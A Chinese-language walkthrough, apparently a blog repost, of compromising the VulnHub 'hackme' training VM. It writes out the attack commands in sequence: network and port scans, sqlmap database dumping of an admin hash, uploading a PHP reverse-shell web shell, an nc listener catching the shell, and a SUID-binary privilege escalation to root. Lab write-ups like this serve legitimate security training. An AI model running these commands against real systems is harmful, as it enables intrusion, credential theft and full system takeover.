本周实践的是vulnhub的hackme镜像,
有两个阻塞点,又是不抛弃不放弃的一天,
下载地址,https://download.vulnhub.com/hackme/hackme.ova,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.88.0/24,
获取到靶机地址是192.168.88.140,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.140,
发现靶机开了22端口的ssh服务、80端口的http服务,
浏览器访问http://192.168.88.140,发现需要登录,
注册个新账户,
用新账户登录,发现有输入接口,
猜测有sql注入漏洞,上burpsuite,抓访问请求,并保存到req.txt,
暴破数据库,sqlmap -r req.txt --dbs --batch,
获取到webapphacking,
暴破数据表,sqlmap -r req.txt -D webapphacking --dump-all --batch,获取到superadmin账户和密码,密码是md5的哈希值,
在线破解md5,获取到Uncrackable,
用superadmin/Uncrackable登录,发现文件上传接口,
本地准备web shell脚本,并上传,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
不知道传哪儿去了,做一下http服务路径的暴破,
dirb http://192.168.88.140,
获取到http://192.168.88.140/uploads,
kali攻击机上开启反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.88.140/uploads/shell.php,
获取到反弹shell,
查找root权限程序,find / -perm -u=s -type f 2>/dev/null,
获取到/home/legacy/touchmenot,
执行获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之hackme的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论